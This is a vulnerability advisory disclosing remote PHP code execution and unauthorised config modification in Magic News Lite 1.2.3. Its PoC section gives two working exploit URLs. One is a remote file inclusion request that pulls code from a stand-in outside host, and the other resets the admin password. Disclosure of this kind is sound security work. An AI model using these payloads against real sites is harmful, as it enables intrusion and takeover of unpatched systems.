PHP Exec and Data Modification in Magic News Lite
Summary
- Vulnerability
- PHP Exec and Data Modification in Magic News Lite
- Discovered
- 2006.02.09
- Last Update
- 2006.02.19 Exploitation code published
- ID
- EV0072
- CVE
- CVE-2006-0723 CVE-2006-0724
- Risk Level
- high
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- Reamday Enterprises (http://reamdaysoft.com)
- Vulnerable Software
- Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html)
- Version
- 1.2.3
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html) script.
1. PHP Code Execution
Vulnerable script: preview.php
Variable $php_script_path is not initialized before being used in include(). This can be used to execute arbitrary php code.
Condition: register_globals = ON
2. Unauthorized Data Modification
Vulnerable script: profile.php
Variables $action $passwd $admin_password $new_passwd $confirm_passwd are not initialized and their values can be replaced by user-defined data. This can be used to make unauthorized modifications in config.php
Condition: register_globals = ON
PoC/Exploit
1. PHP Code Execution Example
http://host/path/preview.php?php_script_path=http://remotehost/lib.php
2. Unauthorized Data Modification Example
http://host/path/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new
Solution.
Solution for "PHP Exec and Data Modification in Magic News Lite" is not available. Check Reamday Enterprises website for updates.